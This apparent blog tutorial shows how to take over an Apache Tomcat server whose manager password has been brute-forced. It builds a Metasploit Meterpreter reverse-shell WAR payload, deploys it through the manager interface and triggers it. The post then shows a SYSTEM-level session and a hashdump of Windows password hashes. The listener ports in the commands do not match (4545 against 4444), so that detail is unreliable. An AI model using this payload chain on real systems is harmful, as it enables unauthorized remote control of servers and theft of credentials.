So, you’ve just brute forced the admin password for the Tomcat web app manager and you want to take it a step further…. step in metasploit.
msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.
1 | ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W >; /root/MetRev.war |
Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.
Once uploaded you then need to connect to the jsp file, the name can be found inside the WAR by quickly unzipping:
1 2 3 4 5 6 7 8 9 10 11 | root@bt:~# unzip -l MetRev.war Archive: MetRev.war Length Date Time Name --------- ---------- ----- ---- 71 2011-05-22 19:06 META-INF/MANIFEST.MF 0 2011-05-22 19:06 WEB-INF/ 267 2011-05-22 19:06 WEB-INF/web.xml 1578 2011-05-22 19:06 nqaxmatvd.jsp 147604 2011-05-22 19:06 jVfQFWuAPAToYS.txt --------- ------- 149520 5 files |
Start the meterpreter reverse_tcp handler and before you know it…
http://192.168.1.112:8080/MetRev/nqaxmatvd.jsp ROOT!!!!
1 2 3 4 5 6 7 8 9 10 11 | msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.109:4444 [*] Starting the payload handler... [*] Sending stage (749056 bytes) to 192.168.1.112 [*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.112:1084) at 2011-05-22 19:09:26 +0100 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:0849fe34e1da4ff869da83eb443e12e3::: |
Leave a Reply
You must be logged in to post a comment.